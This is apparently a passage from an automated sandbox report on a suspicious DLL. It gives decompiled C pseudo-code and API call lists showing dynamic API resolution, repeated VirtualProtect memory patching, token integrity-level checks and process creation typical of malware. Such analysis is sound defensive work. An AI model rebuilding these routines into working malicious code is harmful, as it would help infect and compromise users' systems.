                							_v124.HighPart = _t68;
                						}
                						goto L12;
                						L17:
                						__eflags = _t61 - 0x10d2;
                						if(_t61 != 0x10d2) {
                							_push(0xffffffff);
                							_push(0xff676980);
                							_push(0);
                							_push( *0x1c1a29c);
                							goto L21;
                						} else {
                							__eflags =  *0x1c1a2a0; // 0x0
                							if(__eflags == 0) {
                								goto L12;
                							} else {
                								_t61 = E01C151B1();
                								_push(0xffffffff);
                								_push(0xdc3cba00);
                								_push(0);
                								_push( *0x1c1a2a0);
                								L21:
                								L01C1807C();
                								_v104.LowPart = _t61;
                								_v100 = _t78;
                								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
                								_t65 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
                								__eflags = _t65;
                								_v128 = _t65;
                								if(_t65 == 0) {
                									goto L6;
                								} else {
                									goto L12;
                								}
                							}
                						}
                						L25:
                					}
                					L12:
                					_t82 =  &_v72;
                					_t73 = 3;
                					do {
                						_t54 =  *_t82;
                						if(_t54 != 0) {
                							RtlFreeHeap( *0x1c1a290, 0, _t54); // executed
                						}
                						_t82 =  &(_t82[4]);
                						_t73 = _t73 - 1;
                					} while (_t73 != 0);
                					CloseHandle(_v80);
                				}
                				return _v92.HighPart;
                				goto L25;
                			}

                0x01c1541f
                0x01c15435
                0x01c15439
                0x01c1543e
                0x01c15445
                0x01c1544d
                0x01c15451
                0x01c155d8
                0x01c15457
                0x01c15457
                0x01c15459
                0x01c1545e
                0x01c1545f
                0x01c15465
                0x01c15469
                0x01c1546d
                0x01c1547b
                0x01c15489
                0x01c1548d
                0x01c1548f
                0x01c1549c
                0x01c154a8
                0x01c154ac
                0x01c154b0
                0x01c154b9
                0x01c154c4
                0x01c154c4
                0x01c154bb
                0x01c154bb
                0x01c154c2
                0x00000000
                0x00000000
                0x01c154c2
                0x01c154ce
                0x00000000
                0x01c154d2
                0x01c154d7
                0x01c154e2
                0x01c154e2
                0x01c154ea
                0x01c154f0
                0x01c154f8
                0x01c15501
                0x01c15508
                0x01c1550c
                0x01c15513
                0x01c15517
                0x00000000
                0x00000000
                0x01c15519
                0x01c1551d
                0x01c15520
                0x01c15524
                0x00000000
                0x01c15526
                0x01c15531
                0x01c15536
                0x01c15536
                0x00000000
                0x01c15567
                0x01c15567
                0x01c1556c
                0x01c1558b
                0x01c1558d
                0x01c15592
                0x01c15593
                0x00000000
                0x01c1556e
                0x01c1556e
                0x01c15574
                0x00000000
                0x01c15576
                0x01c15576
                0x01c1557b
                0x01c1557d
                0x01c15582
                0x01c15583
                0x01c15599
                0x01c15599
                0x01c155a1
                0x01c155af
                0x01c155b3
                0x01c155bf
                0x01c155c1
                0x01c155c3
                0x01c155c7
                0x00000000
                0x01c155cd
                0x00000000
                0x01c155cd
                0x01c155c7
                0x01c15574
                0x00000000
                0x01c1556c
                0x01c1553a
                0x01c1553c
                0x01c15540
                0x01c15541
                0x01c15541
                0x01c15545
                0x01c1554f
                0x01c1554f
                0x01c15555
                0x01c15558
                0x01c15558
                0x01c1555f
                0x01c1555f
                0x01c155e6
                0x00000000

                APIs
                • memset.NTDLL ref: 01C15439
                • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 01C15445
                • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 01C1546D
                • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 01C1548D
                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,01C1365E,?), ref: 01C154A8
                • RtlFreeHeap.NTDLL(00000000,00000000,?,?,?,?,?,?,?,?,?,?,01C1365E,?,00000000), ref: 01C1554F
                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,01C1365E,?,00000000,?,?), ref: 01C1555F
                • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 01C15599
                • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?), ref: 01C155B3
                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 01C155BF
                  • Part of subcall function 01C15CF6: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,021793E0,00000000,?,74E5F710,00000000,74E5F730), ref: 01C15D45
                  • Part of subcall function 01C15CF6: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,02179418,?,00000000,30314549,00000014,004F0053,021793D4), ref: 01C15DE2
                  • Part of subcall function 01C15CF6: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,01C154C0), ref: 01C15DF4
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,01C1365E,?,00000000,?,?), ref: 01C155D2
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                • String ID: Ut
                • API String ID: 3521023985-8415677
                • Opcode ID: f26a048f2542c7f662e49c1d03638b83acbaca13598d6fdef560068855ca609a
                • Instruction ID: 897cd38358ffa1f09720308725378fb0fb503827e7b57d86da645e0061bfbb5d
                • Opcode Fuzzy Hash: f26a048f2542c7f662e49c1d03638b83acbaca13598d6fdef560068855ca609a
                • Instruction Fuzzy Hash: 8251BE71489321EFD7219F15DC44AABBBE8FB8B324F104A1AF499C2198D770C604DF92
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                control_flow_graph 175 46c609c-46c60ad 176 46c60af-46c60bb call 46c6220 call 46d8e5e 175->176 177 46c6101-46c610c 175->177 191 46c60c1-46c60ce SleepEx 176->191 179 46c610e call 46c6584 177->179 180 46c6113-46c6125 call 46cef26 177->180 179->180 186 46c6136-46c613d 180->186 187 46c6127-46c6134 ReleaseMutex CloseHandle 180->187 189 46c614e-46c615b SleepEx 186->189 190 46c613f-46c614c ResetEvent CloseHandle 186->190 187->186 189->189 192 46c615d 189->192 190->189 191->191 193 46c60d0-46c60d7 191->193 194 46c6162-46c616f SleepEx 192->194 195 46c60ed-46c60ff RtlDeleteCriticalSection * 2 193->195 196 46c60d9-46c60df 193->196 197 46c6178-46c617f 194->197 198 46c6171-46c6176 194->198 195->177 196->195 199 46c60e1-46c60e8 call 46c57e0 196->199 200 46c6190-46c6197 197->200 201 46c6181-46c618a HeapFree 197->201 198->194 198->197 199->195 203 46c619f-46c61a5 200->203 204 46c6199-46c619a call 46e4177 200->204 201->200 205 46c61b6-46c61bd 203->205 206 46c61a7-46c61ae 203->206 204->203 209 46c61bf-46c61c0 RtlRemoveVectoredExceptionHandler 205->209 210 46c61c6-46c61cc 205->210 206->205 208 46c61b0-46c61b2 206->208 208->205 209->210 211 46c61ce call 46d0bbd 210->211 212 46c61d3 210->212 211->212 214 46c61d8-46c61e5 SleepEx 212->214 215 46c61ee-46c61f7 214->215 216 46c61e7-46c61ec 214->216 217 46c620f-46c621f LocalFree 215->217 218 46c61f9-46c61fe 215->218 216->214 216->215 218->217 219 46c6200 218->219 220 46c6203-46c620d CloseHandle 219->220 220->217 220->220
                APIs
                • SleepEx.KERNELBASE(00000064,00000001,00000000,?,?,?,046CE039), ref: 046C60C5
                • RtlDeleteCriticalSection.NTDLL(046EE460), ref: 046C60F8
                • RtlDeleteCriticalSection.NTDLL(046EE480), ref: 046C60FF
                • ReleaseMutex.KERNEL32(00000448,00000000,?,?,?,046CE039), ref: 046C6128
                • CloseHandle.KERNEL32(?,?,046CE039), ref: 046C6134
                • ResetEvent.KERNEL32(00000000,00000000,?,?,?,046CE039), ref: 046C6140
                • CloseHandle.KERNEL32(?,?,046CE039), ref: 046C614C
                • SleepEx.KERNELBASE(00000064,00000001,00000000,?,?,?,046CE039), ref: 046C6152
                • SleepEx.KERNEL32(00000064,00000001,?,?,046CE039), ref: 046C6166
                • HeapFree.KERNEL32(00000000,00000000,?,?,046CE039), ref: 046C618A
                • RtlRemoveVectoredExceptionHandler.NTDLL(01333FC8), ref: 046C61C0
                • SleepEx.KERNEL32(00000064,00000001,?,?,046CE039), ref: 046C61DC
                • CloseHandle.KERNEL32(04C98418,?,?,046CE039), ref: 046C6205
                • LocalFree.KERNEL32(?,?,046CE039), ref: 046C6215
                  • Part of subcall function 046C6220: GetVersion.KERNEL32(?,?,74E5F720,?,046C60B4,00000000,?,?,?,046CE039), ref: 046C6244
                  • Part of subcall function 046C6220: GetModuleHandleA.KERNEL32(?,04C997B5,?,74E5F720,?,046C60B4,00000000,?,?,?,046CE039), ref: 046C6261
                  • Part of subcall function 046C6220: GetProcAddress.KERNEL32(00000000), ref: 046C6268
                  • Part of subcall function 046D8E5E: RtlEnterCriticalSection.NTDLL(046EE480), ref: 046D8E68
                  • Part of subcall function 046D8E5E: RtlLeaveCriticalSection.NTDLL(046EE480), ref: 046D8EA4
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: CriticalHandleSectionSleep$Close$DeleteFree$AddressEnterEventExceptionHandlerHeapLeaveLocalModuleMutexProcReleaseRemoveResetVectoredVersion
                • String ID:
                • API String ID: 1765366784-0
                • Opcode ID: 35b507456c106e626d06200ec85bd08073c58660c72d7aca695dd270439bbd69
                • Instruction ID: 1d490a7fec90a30f1613f7666cfdbe7ce58f2e27660527acd36d63bc55640f84
                • Opcode Fuzzy Hash: 35b507456c106e626d06200ec85bd08073c58660c72d7aca695dd270439bbd69
                • Instruction Fuzzy Hash: E7417D31B40211AFE720AF6AEC84A6577E9EB24745B05102DF500DB691FB7BFC40CBA8
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph
                APIs
                • lstrlen.KERNEL32(?,?,00000000,?,046CB5BA,046ED4E4,046C159F,046C158F,00000004,00000000,?,00000000,046E48E6,046DCCD7,046C159F,046C158F), ref: 046E0B9A
                • VirtualProtect.KERNELBASE(00000000,00000000,00000040,-0000001C,?,00000000,?,046CB5BA,046ED4E4,046C159F,046C158F,00000004,00000000,?,00000000,046E48E6), ref: 046E0BAC
                • lstrcpy.KERNEL32(00000000,?), ref: 046E0BBB
                • VirtualProtect.KERNELBASE(00000000,00000000,?,-0000001C,?,00000000,?,046CB5BA,046ED4E4,046C159F,046C158F,00000004,00000000,?,00000000,046E48E6), ref: 046E0BCC
                • VirtualProtect.KERNELBASE(?,00000005,00000040,-0000001C,046EA510,00000018,046E5756,?,00000000,?,046CB5BA,046ED4E4,046C159F,046C158F,00000004,00000000), ref: 046E0C02
                • VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,?,046CB5BA,046ED4E4,046C159F,046C158F,00000004,00000000,?,00000000,046E48E6), ref: 046E0C1D
                • VirtualProtect.KERNEL32(?,00000004,00000040,-0000001C,046EA510,00000018,046E5756,?,00000000,?,046CB5BA,046ED4E4,046C159F,046C158F,00000004,00000000), ref: 046E0C32
                • VirtualProtect.KERNELBASE(?,00000004,00000040,-0000001C,046EA510,00000018,046E5756,?,00000000,?,046CB5BA,046ED4E4,046C159F,046C158F,00000004,00000000), ref: 046E0C5F
                • VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,?,046CB5BA,046ED4E4,046C159F,046C158F,00000004,00000000,?,00000000,046E48E6), ref: 046E0C79
                • GetLastError.KERNEL32(?,00000000,?,046CB5BA,046ED4E4,046C159F,046C158F,00000004,00000000,?,00000000,046E48E6,046DCCD7,046C159F,046C158F), ref: 046E0C80
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: ProtectVirtual$ErrorLastlstrcpylstrlen
                • String ID:
                • API String ID: 3676034644-0
                • Opcode ID: e7ca2a9e14bd9285b9bc6969066ccc7e7e011669c5eeac810b5fcde9cb3a99a0
                • Instruction ID: 1b43de68f68c87c17024148dd11acf3aaaa2a3bb0c5056b1eaddeb40fb611e04
                • Opcode Fuzzy Hash: e7ca2a9e14bd9285b9bc6969066ccc7e7e011669c5eeac810b5fcde9cb3a99a0
                • Instruction Fuzzy Hash: 88412DB1A0170A9FDB219FA6CC44EBAB7F8FB08714F008515E656A7690E775F805DB20
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph
                C-Code - Quality: 73%
                			E01C11212(void* __eax, void* __ecx) {
                				long _v8;
                				char _v12;
                				void* _v16;
                				void* _v28;
                				long _v32;
                				void _v104;
                				char _v108;
                				long _t36;
                				intOrPtr _t40;
                				intOrPtr _t47;
                				intOrPtr _t50;
                				void* _t58;
                				void* _t68;
                				intOrPtr* _t70;
                				intOrPtr* _t71;
                
                				_t1 = __eax + 0x14; // 0x74183966
                				_t69 =  *_t1;
                				_t36 = E01C121FA(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16); // executed
                				_v8 = _t36;
                				if(_t36 != 0) {
                					L12:
                					return _v8;
                				}
                				E01C17A9C( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
                				_t40 = _v12(_v12);
                				_v8 = _t40;
                				if(_t40 == 0 && ( *0x1c1a2b8 & 0x00000001) != 0) {
                					_v32 = 0;
                					asm("stosd");
                					asm("stosd");
                					asm("stosd");
                					_v108 = 0;
                					memset( &_v104, 0, 0x40);
                					_t47 =  *0x1c1a2d8; // 0x55d5a8
                					_t18 = _t47 + 0x1c1b3b3; // 0x73797325
                					_t68 = E01C16EE4(_t18);
                					if(_t68 == 0) {
                						_v8 = 8;
                					} else {
                						_t50 =  *0x1c1a2d8; // 0x55d5a8
                						_t19 = _t50 + 0x1c1b760; // 0x2178d08
                						_t20 = _t50 + 0x1c1b0af; // 0x4e52454b
                						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
                						if(_t71 == 0) {
                							_v8 = 0x7f;
                						} else {
                							_v108 = 0x44;
                							E01C16CFD();
                							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0); // executed
                							_push(1);
                							E01C16CFD();
                							if(_t58 == 0) {
                								_v8 = GetLastError();
                							} else {
                								CloseHandle(_v28);
                								CloseHandle(_v32);
                							}
                						}
                						HeapFree( *0x1c1a290, 0, _t68);
                					}
                				}
                				_t70 = _v16;
                				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
                				E01C12C11(_t70);
                				goto L12;
                			}

                APIs
                  • Part of subcall function 01C121FA: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,01C1122E,?,?,?,?,00000000,00000000), ref: 01C1221F
                  • Part of subcall function 01C121FA: GetProcAddress.KERNEL32(00000000,7243775A), ref: 01C12241
                  • Part of subcall function 01C121FA: GetProcAddress.KERNEL32(00000000,614D775A), ref: 01C12257
                  • Part of subcall function 01C121FA: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 01C1226D
                  • Part of subcall function 01C121FA: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 01C12283
                  • Part of subcall function 01C121FA: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 01C12299
                • memset.NTDLL ref: 01C1127C
                  • Part of subcall function 01C16EE4: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,01C11295,73797325), ref: 01C16EF5
                  • Part of subcall function 01C16EE4: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 01C16F0F
                • GetModuleHandleA.KERNEL32(4E52454B,02178D08,73797325), ref: 01C112B2
                • GetProcAddress.KERNEL32(00000000), ref: 01C112B9
                • HeapFree.KERNEL32(00000000,00000000), ref: 01C11321
                  • Part of subcall function 01C16CFD: GetProcAddress.KERNEL32(36776F57,01C160F7), ref: 01C16D18
                • CloseHandle.KERNEL32(00000000,00000001), ref: 01C112FE
                • CloseHandle.KERNEL32(?), ref: 01C11303
                • GetLastError.KERNEL32(00000001), ref: 01C11307
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                • String ID: Ut
                • API String ID: 3075724336-8415677
                • Opcode ID: bb43ad4cc2bf64cc4ab27a9f9c8c5f10342cb2f4e6e7abc0d9e8eb9e13143721
                • Instruction ID: 595bd6743d5ff0415f56cf557a0e069ca79d64b00203afb10e611bfab13e24ac
                • Opcode Fuzzy Hash: bb43ad4cc2bf64cc4ab27a9f9c8c5f10342cb2f4e6e7abc0d9e8eb9e13143721
                • Instruction Fuzzy Hash: A63170B2840219EFDB21AFA4DC88E9EBBBCFB0A344F544465E606E3118D675DE44EB50
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                APIs
                  • Part of subcall function 046D7254: VirtualProtect.KERNELBASE(?,00000000,00000040,00000004,00000000,?,00000000,00000000,005A95A8,?,046CB526,00000004,00000000,?,00000000,046E48E6), ref: 046D7279
                  • Part of subcall function 046D7254: GetLastError.KERNEL32(?,00000000,00000000,005A95A8,?,046CB526,00000004,00000000,?,00000000,046E48E6,046DCCD7,046C159F,046C158F), ref: 046D7281
                  • Part of subcall function 046D7254: VirtualQuery.KERNEL32(?,00000000,0000001C,?,00000000,00000000,005A95A8,?,046CB526,00000004,00000000,?,00000000,046E48E6,046DCCD7,046C159F), ref: 046D7298
                  • Part of subcall function 046D7254: VirtualProtect.KERNEL32(?,00000000,-2C9B417C,00000004,?,00000000,00000000,005A95A8,?,046CB526,00000004,00000000,?,00000000,046E48E6,046DCCD7), ref: 046D72BD
                • GetLastError.KERNEL32(00000000,00000004,00000002,00000000,?,00000000,00000000,046EA580,0000001C,046DBB7F,00000002,?,00000001,00000000,046ED514,00000000), ref: 046D8E27
                  • Part of subcall function 046D4D6C: lstrlen.KERNEL32(8B000000,046CB526,?,046CB526,00000004), ref: 046D4DA4
                  • Part of subcall function 046D4D6C: lstrcpy.KERNEL32(00000000,8B000000), ref: 046D4DBB
                  • Part of subcall function 046D4D6C: StrChrA.SHLWAPI(00000000,0000002E,?,046CB526,00000004), ref: 046D4DC4
                  • Part of subcall function 046D4D6C: GetModuleHandleA.KERNEL32(00000000,?,046CB526,00000004), ref: 046D4DE2
                • VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,00000000,00000005,?,00000000,8B000000,?,00000004,00000000,00000004,00000002,00000000,?), ref: 046D8DA5
                • VirtualProtect.KERNELBASE(046CB73B,00000004,00000002,00000002,?,00000004,00000000,00000004,00000002,00000000,?,00000000,00000000,046EA580,0000001C,046DBB7F), ref: 046D8DC0
                • RtlEnterCriticalSection.NTDLL(046EE480), ref: 046D8DE4
                • RtlLeaveCriticalSection.NTDLL(046EE480), ref: 046D8E02
                  • Part of subcall function 046D7254: SetLastError.KERNEL32(00000000,?,00000000,00000000,005A95A8,?,046CB526,00000004,00000000,?,00000000,046E48E6,046DCCD7,046C159F,046C158F), ref: 046D72C6
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Virtual$Protect$ErrorLast$CriticalSection$EnterHandleLeaveModuleQuerylstrcpylstrlen
                • String ID:
                • API String ID: 899430048-3916222277
                • Opcode ID: 57d5aa628b3118193a745a41ff2f0c67bb37a2d5fd84bbeb48b17c6f102144f3
                • Instruction ID: e1edcb3b17431aacebb281d14703eb7688c1b720bac2fe4a857bb4f2c6832954
                • Opcode Fuzzy Hash: 57d5aa628b3118193a745a41ff2f0c67bb37a2d5fd84bbeb48b17c6f102144f3
                • Instruction Fuzzy Hash: 77416F71900615EFDB10EF69C848AADFBF4FF58310F14811AE925AB290E734E951CFA0
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph
                APIs
                  • Part of subcall function 046CE4DC: GetProcAddress.KERNEL32(?,00000318), ref: 046CE501
                  • Part of subcall function 046CE4DC: NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 046CE51D
                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 046D4461
                • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 046D454C
                  • Part of subcall function 046CE4DC: StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000318,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 046CE687
                • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 046D4497
                • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 046D44A3
                • lstrcmpi.KERNEL32(?,00000000), ref: 046D44E0
                • StrChrA.SHLWAPI(?,0000002E), ref: 046D44E9
                • lstrcmpi.KERNEL32(?,00000000), ref: 046D44FB
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Virtual$AllocFreelstrcmpi$AddressInformationProcProcess64QueryWow64
                • String ID:
                • API String ID: 3901270786-0
                • Opcode ID: 605b343dc45e6e25877a4d22d7779d0640bc64a30c20803ef593947cdfbe7878
                • Instruction ID: a96ecc12ac639847a7c80aec80610dc894d63d0dab12f6dfd5c16957e8edbecb
                • Opcode Fuzzy Hash: 605b343dc45e6e25877a4d22d7779d0640bc64a30c20803ef593947cdfbe7878
                • Instruction Fuzzy Hash: FE316071904315ABD321DF11DC44B2BBBE8FF88B58F114A19F98967240EB34ED04CBA6
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                APIs
                  • Part of subcall function 046CF607: memset.NTDLL ref: 046CF611
                • OpenEventA.KERNEL32(00000002,00000000,046EE374,?,00000000,00000000,?,046DE99E,?,?,?,?,?,?,?,046C8D64), ref: 046D0F81
                • SetEvent.KERNEL32(00000000,?,046DE99E,?,?,?,?,?,?,?,046C8D64,?,?,?,?,?), ref: 046D0F8E
                • Sleep.KERNELBASE(00000BB8,?,046DE99E,?,?,?,?,?,?,?,046C8D64,?,?,?,?,?), ref: 046D0F99
                • ResetEvent.KERNEL32(00000000,?,046DE99E,?,?,?,?,?,?,?,046C8D64,?,?,?,?,?), ref: 046D0FA0
                • CloseHandle.KERNEL32(00000000,?,046DE99E,?,?,?,?,?,?,?,046C8D64,?,?,?,?,?), ref: 046D0FA7
                • GetShellWindow.USER32 ref: 046D0FB2
                • GetWindowThreadProcessId.USER32(00000000), ref: 046D0FB9
                  • Part of subcall function 046DBB9E: RegCloseKey.ADVAPI32(046DE99E), ref: 046DBC21
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Event$CloseWindow$HandleOpenProcessResetShellSleepThreadmemset
                • String ID:
                • API String ID: 53838381-0
                • Opcode ID: 0cf54c86bd220c36ceb476e576e070538bf171571d5fb03bf2ffeb010f5c1460
                • Instruction ID: 78ce17f84342d6607bb36984e93650b094ef5fc505f9a17e0282df0a653dc50e
                • Opcode Fuzzy Hash: 0cf54c86bd220c36ceb476e576e070538bf171571d5fb03bf2ffeb010f5c1460
                • Instruction Fuzzy Hash: F5214132600610BBD3146B67DC48E6B7BA9EBC9755F209109F9099B281FB3ABC01CB75
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E01C15B49(long* _a4) {
                				long _v8;
                				void* _v12;
                				void _v16;
                				long _v20;
                				int _t33;
                				void* _t46;
                
                				_v16 = 1;
                				_v20 = 0x2000;
                				if( *0x1c1a2b4 > 5) {
                					_v16 = 0;
                					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
                						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                						_v8 = 0;
                						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                						if(_v8 != 0) {
                							_t46 = E01C12114(_v8);
                							if(_t46 != 0) {
                								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                								if(_t33 != 0) {
                									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                								}
                								E01C12C11(_t46);
                							}
                						}
                						CloseHandle(_v12);
                					}
                				}
                				 *_a4 = _v20;
                				return _v16;
                			}

                APIs
                • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 01C15B7B
                • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 01C15B9B
                • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 01C15BAB
                • CloseHandle.KERNEL32(00000000), ref: 01C15BFB
                  • Part of subcall function 01C12114: RtlAllocateHeap.NTDLL(00000000,00000000,01C16F72), ref: 01C12120
                • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 01C15BCE
                • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 01C15BD6
                • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 01C15BE6
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                • String ID:
                • API String ID: 1295030180-0
                • Opcode ID: 10e5704b6ea881de57b2f46ff47179e2234cb7cbc005aca5265b05e24a04fad8
                • Instruction ID: 3b0f704e2a1eb049988a2a3596446daa55ac36b1748a76a9511ec826d7015d13
                • Opcode Fuzzy Hash: 10e5704b6ea881de57b2f46ff47179e2234cb7cbc005aca5265b05e24a04fad8
                • Instruction Fuzzy Hash: D3213975940259FFEB109F94DC84EEEBBB9FB4A304F1040A6EA12A3154C771CB44EB60
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 64%
                			E01C152C4(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                				intOrPtr _v8;
                				intOrPtr _t9;
                				intOrPtr _t13;
                				char* _t19;
                				char* _t28;
                				void* _t33;
                				void* _t34;
                				char* _t36;
                				void* _t38;
                				intOrPtr* _t39;
                				char* _t40;
                				char* _t42;
                				char* _t43;
                
                				_t34 = __edx;
                				_push(__ecx);
                				_t9 =  *0x1c1a2d8; // 0x55d5a8
                				_t1 = _t9 + 0x1c1b62c; // 0x253d7325
                				_t36 = 0;
                				_t28 = E01C13CE5(__ecx, _t1);
                				if(_t28 != 0) {
                					_t39 = __imp__;
                					_t13 =  *_t39(_t28, _t38);
                					_v8 = _t13;
                					_t40 = E01C12114(_v8 +  *_t39(_a4) + 1);
                					if(_t40 != 0) {
                						strcpy(_t40, _t28);
                						_pop(_t33);
                						__imp__(_t40, _a4);
                						_t19 = E01C11628(_t33, _t34, _t40, _a8); // executed
                						_t36 = _t19;
                						E01C12C11(_t40);
                						_t42 = E01C173CA(StrTrimA(_t36, "="), _t36);
                						if(_t42 != 0) {
                							E01C12C11(_t36);
                							_t36 = _t42;
                						}
                						_t43 = E01C12A4E(_t36, _t33);
                						if(_t43 != 0) {
                							E01C12C11(_t36);
                							_t36 = _t43;
                						}
                					}
                					E01C12C11(_t28);
                				}
                				return _t36;
                			}

                APIs
